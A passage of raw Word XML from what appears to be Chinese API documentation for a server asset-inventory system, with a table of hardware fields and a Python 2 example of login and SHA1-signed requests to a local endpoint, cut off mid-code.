          <w:p w14:paraId="79177981" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="149D5323" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="728B1032" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>机房位置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5DDCEA3B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0631DE9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>chargeName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="423628F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32CE7634" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35998700" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>负责人</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6714EF33" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F12D476" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>memories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="106DBCD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CF13A79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type：varchar(512) producer：varchar(512) size：int(10) speed：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(4) description：</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve">1024) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>producerSize:bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">(20) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bank:varchar</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D5D15AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">硬件配置信息 type：生产商 producer：生产厂商 size：单条内存大小,(系统实际大小)单位MB speed：内存主频率，单位MHz description：描述 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>producerSize</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>:出厂内存条大小 bank：内存条信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6B9DF162" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29296C91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>manufacturer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3536C5E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1151FBFE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="113CFC0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>生产商</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F1C205A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25423011" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>productName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="773AD291" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26ACEF13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="535C830B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>设备型号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1154521D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1511F0FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>serialNumber</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C570102" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60CEA788" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72FDE558" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>序列号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="29423511" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ADEE0CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>networkCards</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0362F025" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05A35CA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">name：varchar(512) mac：varchar(512) ipv4：varchar(15) ipv6：varchar(32) gateway：varchar(1024) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dnsServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：varchar(512) netmask：varchar(15) broadcast：varchar(15) status：</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>varchar(2) speed：long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67259E99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">网卡信息 name：网卡名 mac：mac地址 ipv4：ipv4网卡地址 ipv6：ipv6网卡地址 gateway：网关 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dnsServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dnsserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> netmask：子网掩码 broadcast：广播地址 status：</w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>网卡状态，空字符串：未知，"1"：已连接，"0"：未连接 speed：网卡速度，单位：Mb/s，0表示未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BFA8CB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>代码示例(python)：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F52386" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>#! /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/bin/env python</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">from __future__ import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>absolute_import</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>host = "127.0.0.1"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>port = 80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 登录请求调用示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def login():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/v1/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/auth" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    body = {"username": "dev@xx.com", "password": "abc@123"}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(body)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method="POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, body=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json_body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, headers=header)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    response = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.getresponse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>response.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.loads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(res)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># 发送请求</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(method, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 参看登录认证里面的登录方法代码示例</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = login()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>signKey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login_result.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("data").get("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 当前时间戳</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>time.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    if data is not None:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        info = ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        if method == "GET":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            # 对参数key进行字典排序</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            keys = sorted(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>())</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            for key in keys:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                info = info + key + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data.get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key))</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                print info</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> method == "POST" or method == "PUT" or method == "DELETE":</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            info = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json.dumps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + info + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        # 拼接待签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sign_key</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 对待签名字符串进行sha1得到签名字符串</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    sign = hashlib.sha1(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>to_sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdigest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    # 组装http请求头参数</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    header = {"Content-Type": "application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, "timestamp": </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">              "sign": sign, "Authorization": "Bearer " + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    conn = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>httplib.HTTPConnection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>conn.request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
